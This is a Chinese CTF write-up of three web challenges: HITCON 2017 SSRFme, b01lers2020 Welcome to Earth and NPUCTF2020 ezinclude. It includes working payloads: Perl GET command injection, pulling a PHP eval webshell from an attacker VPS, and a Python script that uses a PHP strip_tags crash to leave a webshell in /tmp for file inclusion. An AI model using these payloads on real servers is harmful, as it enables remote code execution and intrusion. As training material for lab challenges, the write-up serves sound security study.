[HITCON 2017]SSRFme
直接给了源代码,题目名称还是ssrf,那么该题大概率就是SSRF的漏洞,进行代码审计。
<?php
// 检查是否存在 HTTP_X_FORWARDED_FOR 头,如果存在,则将其拆分为数组,并将第一个 IP 地址赋值给 REMOTE_ADDR。
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
// 输出用户的远程地址(IP 地址)。
echo $_SERVER["REMOTE_ADDR"];
// 创建一个以用户 IP 地址(结合字符串 "orange")生成的 MD5 哈希值命名的沙盒目录。
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox); // 创建沙盒目录,如果目录已存在,错误将被抑制。
@chdir($sandbox); // 切换到沙盒目录中。
// 使用 shell 命令 GET 获取由 URL 参数指定的资源。
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
// 解析文件路径信息,获取文件名和目录名等信息。
$info = pathinfo($_GET["filename"]);
// 去掉目录名中的点号,防止目录穿越漏洞。
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir); // 创建目录,如果目录已存在,错误将被抑制。
@chdir($dir); // 切换到新创建的目录中。
// 将获取到的数据写入指定的文件中。
@file_put_contents(basename($info["basename"]), $data);
// 高亮显示当前脚本文件的代码。
highlight_file(__FILE__);
如果存在 HTTP_X_FORWARDED_FOR 头,则使用其第一个值,否则使用 REMOTE_ADDR。接着利用用户 IP 生成的 MD5 值来创建目录,确保每个用户的操作在不同的目录中进行。执行GET拼接shell命令,内容可控。将可控内容写入到可控文件中。
实现发送GET请求给当前GET参数’url‘,并将其结果保存在/sandbox/md5/filename中,其中filename为传入的Get参数。
构造?url=./../../&filename=123
然后访问,目录是 sandbox/(orange+ip)的MD5值/123
可以看到目录,但是不能够直接访问,尝试再多写一个../
?url=./../../../&filename=123
再加,最后为?url=./../../../../../&filename=123
已经可以看到根目录下的flag了。还可以看到readflag文件。那么思路就是利用readflag文件读取flag。
尝试redaflag
?url=/readflag&filename=123
但是访问后是下载了一个二进制文件
并没有执行,那么就尝试将根目录下flag文件的内容写入到我们创建的文件中
利用到bash -c
bash: 这是指 Bash Shell,一种常用的命令行解释器。-c: 选项-c表示 Bash 将执行接下来的字符串作为命令。
/?url=file:bash -c /readflag|&filename=bash -c /readflag
file: 协议:通常用于访问文件系统中的文件。
再次传参/?url=file:bash -c /readflag&filename=123
然后访问
但是回显是空的。
但是还可以使用另一种解法。
在vps上绑定一句话木马进行监听,然后通过GET命令去请求,用$_GET[“filename”]传入的值作为文件名保存。
python3 -m http.server
用python启用一个http服务。
构造pyalod进行请求
?url=172.17.xx.xx:8000/shell.php&filename=shell.php
然后再去访问,这样就把我们的马子给写进去了。
蚁剑直接连接
但是flag不可以直接打开,需要执行readflag
总结,该题可以使用两种解法,一个是利用原来的readflag文件读取flag,并将读取的结果输入到我们创建的文件中;
第二种就是利用vps,直接把vps的木马挂到我们创建的文件中就可以getshell。
该题的考点是ssrf,GET命令的一个漏洞,GET命令是用perl来执行,而prel的open可以执行命令。
这里的GET不是我么平常的GET方法传参,这里的GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理。
这里GET一个根目录,功能类似于ls把它给列出来。
[b01lers2020]Welcome to Earth
一个页面,但是是名为/die/
查看源代码
什么都没有,把/die/删掉看一看
可以看到源代码,访问 /chase/
接着访问/leftt/
接着访问/shoot/
接着访问/door/
接着访问/static/js/door.js
接着访问/open/
接着访问/static/js/open_sesame.js
最后访问/static/js/fight.js
得到源代码
// Run to scramble original flag
//console.log(scramble(flag, action));
function scramble(flag, key) {
for (var i = 0; i < key.length; i++) {
let n = key.charCodeAt(i) % flag.length;
let temp = flag[i];
flag[i] = flag[n];
flag[n] = temp;
}
return flag;
}
function check_action() {
var action = document.getElementById("action").value;
var flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"];
// TODO: unscramble function
}
flag被打乱了,还原flag。
# 从 itertools 库导入 permutations 函数,该函数可以生成给定可迭代对象的所有排列
from itertools import permutations
# 定义一个包含若干字符串元素的列表 flag
flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]
# 使用 permutations 函数生成 flag 列表中所有元素的排列
item = permutations(flag)
# 遍历所有排列的结果
for i in item:
# 将当前排列 (元组) 转换为字符串
k = ''.join(list(i))
# 检查字符串是否以 "pctf{hey_boys" 开头,并且以 "}" 结尾
if k.startswith('pctf{hey_boys') and k[-1] == '}':
# 如果条件满足,则打印这个符合条件的字符串
print(k)
尝试后得到pctf{hey_boys_im_baaaaaaaaaack!}
该题只有排列组合的问题,就算一个一个排列着试都可以得到正确结果。
[NPUCTF2020]ezinclude
显示username和password是错误的。尝试查看源代码。
有了提示,<!--md5($secret.$name)===$pass -->
在进过尝试后发现name和pass是通过get进行传参的。
可以看到回显有个hash值,猜测可能是md5后的值,传参
/?name=1&pass=576322dd496b99d07b5b0f7fa7934a25
访问flflflflag.php
可以看到include($_GET["file"])
构造?file=php://filter/read=convert.base64-encode/resource=flflflflag.php
查看源代码
<html>
<head>
<script language="javascript" type="text/javascript">
window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_åºé¢äºº_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
w%ude($_GET["~)^"])再扫一下目录,看看还有没有其他可以用的代码。
扫了半天什么都没有扫到,但是看了wp后,存在一个dir.php文件
?file=php://filter/read=convert.base64-encode/resource=dir.php
<?php
var_dump(scandir('/tmp'));
?>dir.php能打印临时文件夹里的内容.
那么我们就可以把码写到临时文件中。
利用php7 segment fault特性(CVE-2018-14884)
php代码中使用php://filter的 strip_tags 过滤器, 可以让 php 执行的时候直接出现 Segment Fault , 这样 php 的垃圾回收机制就不会在继续执行 , 导致 POST 的文件会保存在系统的缓存目录下不会被清除而不像phpinfo那样上传的文件很快就会被删除,这样的情况下我们只需要知道其文件名就可以包含我们的恶意代码。
strip_tags 过滤器的使用。
使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,知道文件名就可以getshell。这个崩溃原因是存在一处空指针引用。向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留,临时文件会被保存在upload_tmp_dir所指定的目录下,默认为tmp文件夹。
构造payloud
/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd
import requests # 导入requests库,用于处理HTTP请求
from io import BytesIO # 导入BytesIO,用于在内存中操作字节数据
# 定义需要执行的PHP代码
payload = "<?php eval($_POST[cmd]);?>" # 这是一个PHP代码片段,可以通过POST数据执行传入的命令
# 准备要发送的数据,模拟一个文件上传
data = {'file': BytesIO(payload.encode())} # 将payload字符串转换为字节并包装在BytesIO对象中,模拟文件上传
# 定义目标服务器的URL
url = "http://ec4fa282-4f36-4ae3-9a08-56112f3a5155.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
# 这个URL使用了PHP过滤器来访问目标服务器上的'/etc/passwd'文件内容
# 发送POST请求,带上准备好的数据和文件上传
r = requests.post(url=url, files=data, allow_redirects=False)
# 发送POST请求,包含'files'数据,'allow_redirects=False'防止自动重定向
运行脚本后访问/dir.php
得到tmp目录下刚刚我们上传的文件路径:/tmp/phpqUFJz7
利用文件包含
flag在里面。
总结:php://filter的 strip_tags 过滤器在php7导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,知道文件名就可以getshell。
